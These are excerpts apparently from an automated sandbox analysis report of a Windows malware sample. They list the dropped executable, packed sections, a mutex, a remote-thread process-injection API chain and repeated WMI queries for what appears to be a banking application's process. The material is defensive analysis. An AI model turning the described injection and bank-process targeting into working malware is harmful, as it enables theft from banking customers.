Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_00000001800502BC	7_2_00000001800502BC
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_00000001800282E0	7_2_00000001800282E0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_0000000180006380	7_2_0000000180006380
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_00000001800243C0	7_2_00000001800243C0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_00000001800233F0	7_2_00000001800233F0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_000000018000F430	7_2_000000018000F430
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_0000000180013480	7_2_0000000180013480
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_000000018000D4B0	7_2_000000018000D4B0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_00000001800404D8	7_2_00000001800404D8
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_000000018004E52C	7_2_000000018004E52C
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_0000000180055544	7_2_0000000180055544
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_0000000180050550	7_2_0000000180050550
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_0000000180022570	7_2_0000000180022570
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_000000018004A594	7_2_000000018004A594
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_00000001800305D0	7_2_00000001800305D0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_0000000180034610	7_2_0000000180034610
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_0000000180024650	7_2_0000000180024650
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_00000001800456BC	7_2_00000001800456BC
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_0000000180055750	7_2_0000000180055750
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_000000018004B760	7_2_000000018004B760
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_0000000180046850	7_2_0000000180046850
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_000000018000E860	7_2_000000018000E860
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_0000000180024920	7_2_0000000180024920
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_00000001800569C8	7_2_00000001800569C8
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_00000001800059D0	7_2_00000001800059D0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_0000000180045A68	7_2_0000000180045A68
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_0000000180051B00	7_2_0000000180051B00
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_0000000180057BA8	7_2_0000000180057BA8
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_0000000180023BF0	7_2_0000000180023BF0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_0000000180054C70	7_2_0000000180054C70
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_000000018004CC9C	7_2_000000018004CC9C
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_000000018000FCA0	7_2_000000018000FCA0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_0000000180026CE0	7_2_0000000180026CE0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_00000001800569C8	7_2_00000001800569C8
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_000000018001AD30	7_2_000000018001AD30
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_0000000180046D5C	7_2_0000000180046D5C
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_000000018001DE80	7_2_000000018001DE80
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_000000018002AE90	7_2_000000018002AE90
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_000000018002CEC0	7_2_000000018002CEC0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_0000000180011EC0	7_2_0000000180011EC0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_0000000180058F58	7_2_0000000180058F58
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_0000000180006FB0	7_2_0000000180006FB0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_0000000180023FC0	7_2_0000000180023FC0

Source: Joe Sandbox View

Dropped File: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe (copy) 625BB2074498952E01A21C2D54B9B9A4C0841F743E038799B907126980A984BE

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: String function: 000000018003B5A0 appears 52 times
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: String function: 000000018001C5F0 appears 188 times
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: String function: 000000018004EDF8 appears 60 times
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: String function: 0000000180038AAC appears 36 times

Source: leg#U00edvel9931-009-140.08372236.exe

Static PE information: Number of sections : 15 > 10

Source: leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C00022A000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameClassicIE.exe< vs leg#U00edvel9931-009-140.08372236.exe
Source: leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C000246000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameClassicIE.exe< vs leg#U00edvel9931-009-140.08372236.exe

Source: leg#U00edvel9931-009-140.08372236.exe	Static PE information: Section: /19 ZLIB complexity 0.9993620227146043
Source: leg#U00edvel9931-009-140.08372236.exe	Static PE information: Section: /32 ZLIB complexity 0.996083361037234
Source: leg#U00edvel9931-009-140.08372236.exe	Static PE information: Section: /65 ZLIB complexity 0.9993609298945376
Source: leg#U00edvel9931-009-140.08372236.exe	Static PE information: Section: /78 ZLIB complexity 0.9931351902173913

Source: 8pIuMUYQX9q.exe, 00000006.00000002.4145963977.0000000002205000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: indowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBpD!

Source: classification engine

Classification label: mal64.rans.evad.winEXE@6/6@1/1

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe

Code function: 6_2_00007FF6B40A1000 LoadLibraryW,GetProcAddress,FreeLibrary,CoInitialize,?DllLogToFile@@YAXPEB_W0ZZ,CoUninitialize,CoInitialize,?DllLogToFile@@YAXPEB_W0ZZ,?DllLogToFile@@YAXPEB_W0ZZ,?DllLogToFile@@YAXPEB_W0ZZ,GetWindowThreadProcessId,OpenProcess,IsWow64Process,CloseHandle,GetModuleFileNameW,PathRemoveFileSpecW,PathAppendW,CreateProcessW,CloseHandle,CloseHandle,?DllLogToFile@@YAXPEB_W0ZZ,FindWindowExW,?DllLogToFile@@YAXPEB_W0ZZ,RegisterWindowMessageW,SendMessageW,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetModuleHandleW,OpenProcess,GetModuleFileNameW,VirtualAllocEx,WriteProcessMemory,GetModuleHandleW,GetProcAddress,CreateRemoteThread,WaitForSingleObject,CloseHandle,VirtualFreeEx,CloseHandle,

6_2_00007FF6B40A1000

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe

Code function: 6_2_0000000180005290 CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,

6_2_0000000180005290

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe

Code function: 6_2_00000001800143F0 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,_invalid_parameter_noinfo_noreturn,

6_2_00000001800143F0

Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe

File created: C:\Users\user\Microsoft.NET

Jump to behavior

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Mutant created: \Sessions\1\BaseNamedObjects\ManagerServiceAppMU
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6300:120:WilError_03

Source: leg#U00edvel9931-009-140.08372236.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
